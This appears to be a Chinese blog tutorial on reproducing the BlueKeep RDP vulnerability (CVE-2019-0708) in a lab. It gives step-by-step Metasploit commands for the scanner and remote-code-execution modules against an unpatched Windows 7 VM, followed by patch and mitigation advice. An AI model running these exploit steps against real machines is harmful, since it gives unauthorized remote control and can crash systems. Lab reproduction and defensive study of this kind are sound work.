最详细利用kali的msf进行CVE-2019-0708漏洞复现
CVE-2019-0708
技术无罪,请勿用于恶意用途,出事本人不负一切责任
0.漏洞背景
Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。
1.影响范围
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
2.复现操作
2.0 提前准备好一个没有打补丁的win7系统(虚拟机和物理机都可以,推荐虚拟机,不要使用自己拿下的服务器,蓝屏后果无法预测)
2.1 打开kali更新msf框架
apt-get update
apt-get upgrade metaspolit-framework
下载可能会慢点,耐心等待即可
2.2 打开msf,并搜索0708
msfconsole
search 0708
usre
2.3 使用扫描模块(scanner)
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhost 192.168.237.131 //这里的ip填写自己win7主机的ip
run
如果发现箭头指向的这段话证明目标主机存在0708漏洞,可以利用
2.4 进行利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show targets //选择目标主机类型 这里我选择了7601 -vmware 15
set target 4
set rhost 192.168.237.131
run
如果出现上述错误 再run几次
如果出现这个,证明已经成功了
直接敲命令就行了,复现成功
可能会出现蓝屏,听说msf的利用已经停稳了,我是没有蓝屏。。
3.防御措施
3.0 及时安装微软发布的安全更新补丁:
Microsoft官方已经在2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁,下载地址为:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
以及为已不受微软更新支持的系统Windows Server 2003和Windows XP提供的安全更新,下载地址:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
3.1缓解措施(在无法及时安装微软安全更新的情况下作为临时性解决方案):
若用户不需要用到远程桌面服务,建议禁用该服务。
开启网络级别身份验证(NLA),此方案适用于Windows 7, Windows Server 2008, Windows Server 2008 R2。
以上缓解措施只能暂时性针对该漏洞对系统进行部分缓解,强烈建议在条件允许的情况下及时安装微软安全更新。
上一篇: 【私房菜】FHS档案放置目录含义约定
下一篇: windows 使用sc 创建系统服务